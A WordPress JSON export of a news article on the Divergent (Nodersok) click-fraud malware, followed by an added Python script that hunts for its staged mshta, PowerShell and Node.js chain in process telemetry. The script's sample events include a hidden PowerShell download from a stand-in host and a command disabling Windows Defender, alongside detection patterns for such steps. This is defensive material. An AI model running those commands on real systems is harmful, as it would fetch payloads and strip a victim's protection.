{"id":321614,"date":"2019-09-30T09:30:04","date_gmt":"2019-09-30T07:30:04","guid":{"rendered":"https:\/\/mybroadband.co.za\/news\/?p=321614"},"modified":"2019-09-30T09:32:00","modified_gmt":"2019-09-30T07:32:00","slug":"new-malware-uses-existing-programs-to-control-pcs","status":"publish","type":"post","link":"https:\/\/mybroadband.co.za\/news\/security\/321614-new-malware-uses-existing-programs-to-control-pcs.html","title":{"rendered":"New malware uses existing programs to control PCs"},"content":{"rendered":"<p><a href=\"https:\/\/www.microsoft.com\/security\/blog\/2019\/09\/26\/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware\/?ranMID=24542&amp;ranEAID=tv2R4u9rImY&amp;ranSiteID=tv2R4u9rImY-1EXkWED_.vGbUsduWKgaBg&amp;epi=tv2R4u9rImY-1EXkWED_.vGbUsduWKgaBg&amp;irgwc=1&amp;OCID=AID2000142_aff_7593_1243925&amp;tduid=(ir__ohhn9a13dgkfrlspkk0sohz30n2xg1dksdofxd0m00)(7593)(1243925)(tv2R4u9rImY-1EXkWED_.vGbUsduWKgaBg)()&amp;irclickid=_ohhn9a13dgkfrlspkk0sohz30n2xg1dksdofxd0m00\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Microsoft<\/strong><\/a> and Cisco&#8217;s <a href=\"https:\/\/blog.talosintelligence.com\/2019\/09\/divergent-analysis.html\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Talos<\/strong><\/a> have uncovered a new form of malware, known as Divergent (Microsoft tracks the same campaign as Nodersok), which lets malicious parties use the victim&#8217;s PC for illegal activities such as click fraud.<\/p>\n<p>Divergent achieves its goals largely with legitimate programs, either ones already present in Windows or open-source tools it downloads from third parties, which makes it harder to spot than malware that drops its own custom executables.<\/p>\n<p>&#8220;This threat uses NodeJS \u2014 a program that executes JavaScript outside of a web browser \u2014 as well as the legitimate open-source utility WinDivert to facilitate some of the functionality in the Divergent malware,&#8221; said Talos.<\/p>\n<p>Talos added that the use of NodeJS is not something commonly seen across malware families, which makes Divergent an interesting development.<\/p>\n<p>However, it shares many similarities with other popular fileless malware families, including Kovter.<\/p>\n<h3 class=\"my-4\">How it works<\/h3>\n<p>&#8220;When first delivered and executed on a victim&#8217;s machine, the malware is in the portable executable (PE) format. Its first task, however, is to install itself to the system in a less suspicious form, namely as an HTML Application (HTA) that will load the malware from the registry,&#8221; said Talos.<\/p>\n<p>Once installed, the following chain of events occurs:<\/p>\n<ul>\n<li>The initial JavaScript file downloads a second JavaScript file.<\/li>\n<li>This second JavaScript file runs a PowerShell command which downloads several malicious tools.<\/li>\n<li>These tools include components that disable Windows Defender, gain elevated control of the PC, and set up a proxy on the machine.<\/li>\n<\/ul>\n<p>Talos believes that the malware was designed for ordinary, financially motivated cybercrime rather than for state-sponsored attacks.<\/p>\n<p>It added that Divergent was probably designed predominantly for click fraud, using the computers of everyday European and US consumers to generate fraudulent ad revenue.<\/p>\n<h3 class=\"my-4\">Now read: <a href=\"https:\/\/mybroadband.co.za\/news\/motoring\/321610-huge-wave-of-account-hijackings-targets-youtube-users.html\" rel=\"bookmark\">Huge wave of account hijackings targets YouTube users<\/a><\/h3>\n","protected":false},"excerpt":{"rendered":"<p>Microsoft and Cisco&#8217;s Talos have uncovered a new form of malware &#8211; known as Divergent &#8211; which lets malicious parties use the victim&#8217;s PC for illegal activities such as click 
fraud.<\/p>\n","protected":false},"author":341039,"featured_media":89863,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[27],"tags":[61156,61154,123,61152],"class_list":["post-321614","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security","tag-click-fraud","tag-divergent","tag-microsoft","tag-talos"],"_links":{"self":[{"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/posts\/321614"}],"collection":[{"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/users\/341039"}],"replies":[{"embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/comments?post=321614"}],"version-history":[{"count":1,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/posts\/321614\/revisions"}],"predecessor-version":[{"id":321626,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/posts\/321614\/revisions\/321626"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/media\/89863"}],"wp:attachment":[{"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/media?parent=321614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/categories?post=321614"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/tags?post=321614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
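The infection chain the article describes (a dropped HTA run by mshta.exe, a PowerShell child that downloads tooling, and follow-on processes that disable Windows Defender or run Node.js) is the kind of staged, living-off-the-land behaviour a defender hunts for in process-creation telemetry rather than by file hash. The script below is an added example, not code from the article, Microsoft or Talos: it scores Sysmon-style process events against behavioural rules and then groups hits by process ancestry so that a lone PowerShell download does not alert but a script-host-to-PowerShell-to-Defender-tamper chain does. The event layout (pid, ppid, image, command line), the rule names and every sample event are constructed for illustration; the command lines are plausible stand-ins, not Divergent indicators of compromise.

```python
"""Added example (not from the article, Microsoft or Talos): behavioural hunt
over process-creation telemetry for the staged chain the article describes,
i.e. an HTA run by mshta.exe, a PowerShell child that downloads tooling, and
follow-on processes that disable Windows Defender or run Node.js from a
user-writable path. Event layout and all sample events are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    """Minimal Sysmon Event ID 1-style record (assumed field set)."""
    pid: int
    ppid: int
    image: str     # full path of the started process
    cmdline: str   # its command line


SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
USER_PATH = re.compile(r"\\(AppData|Temp|ProgramData)\\", re.IGNORECASE)
DOWNLOAD = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    re.IGNORECASE,
)
# Any Set-MpPreference switch that turns a Defender feature off.
DEFENDER_OFF = re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$?true", re.IGNORECASE)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def flag_events(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Return {pid: [rule names]} for every event that trips at least one rule."""
    by_pid = {e.pid: e for e in events}
    hits: dict[int, list[str]] = {}
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""
        rules = []
        # Stage 1: the installed HTA, launched from a user-writable location.
        if name == "mshta.exe" and re.search(r"\.hta\b", e.cmdline, re.I) and USER_PATH.search(e.cmdline):
            rules.append("hta_from_user_path")
        # Stage 2: a script host handing off to PowerShell, and PowerShell fetching payloads.
        if name == "powershell.exe" and parent_name in SCRIPT_HOSTS:
            rules.append("script_host_spawns_powershell")
        if name == "powershell.exe" and DOWNLOAD.search(e.cmdline):
            rules.append("powershell_download")
        # Stage 3: downloaded tooling disabling Defender or running Node.js from a user path.
        if DEFENDER_OFF.search(e.cmdline):
            rules.append("defender_disable")
        if name == "node.exe" and USER_PATH.search(e.image):
            rules.append("node_from_user_path")
        if rules:
            hits[e.pid] = rules
    return hits


def staged_chains(events: list[ProcEvent], min_hits: int = 2) -> list[tuple[int, ...]]:
    """Group hits by process ancestry: a chain is the flagged pids on one
    parent->child line (root first). Only maximal chains with at least
    ``min_hits`` flagged processes are returned, so one lone download does
    not alert but HTA -> PowerShell download -> Defender tamper does."""
    by_pid = {e.pid: e for e in events}
    hits = flag_events(events)
    chains: list[tuple[int, ...]] = []
    for pid in hits:
        chain, cur, seen = [], pid, set()
        while cur in by_pid and cur not in seen:   # ``seen`` guards against pid-reuse loops
            seen.add(cur)
            if cur in hits:
                chain.append(cur)
            cur = by_pid[cur].ppid
        chain.reverse()
        if len(chain) >= min_hits:
            chains.append(tuple(chain))
    maximal = [c for c in chains if not any(o != c and o[: len(c)] == c for o in chains)]
    return sorted(maximal)


# Constructed sample telemetry: one benign PowerShell (pid 600) beside a staged chain.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\alice\AppData\Roaming\update.hta"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.zip','C:\Users\alice\AppData\Local\Temp\a.zip')"'''),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(500, 300, r"C:\Users\alice\AppData\Local\Temp\node\node.exe", "node.exe agent.js"),
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Process"),
]

if __name__ == "__main__":
    for pid, rules in sorted(flag_events(SAMPLE_EVENTS).items()):
        print(pid, rules)
    print("staged chains:", staged_chains(SAMPLE_EVENTS))
```

On the sample data the benign `Get-Process` launch (pid 600) trips nothing, while the HTA, its PowerShell downloader and the two follow-on processes are reported as two maximal chains, 200 -> 300 -> 400 and 200 -> 300 -> 500. The chain requirement is the point: each rule on its own (a PowerShell download, a Node.js binary under AppData) is noisy in an enterprise, but several of them on one ancestry line closely matches the staged behaviour described above. Because Divergent stores its payload in the registry, a complementary check is to audit Run keys and scheduled tasks for mshta.exe or script-host launch commands, which the process telemetry alone does not cover.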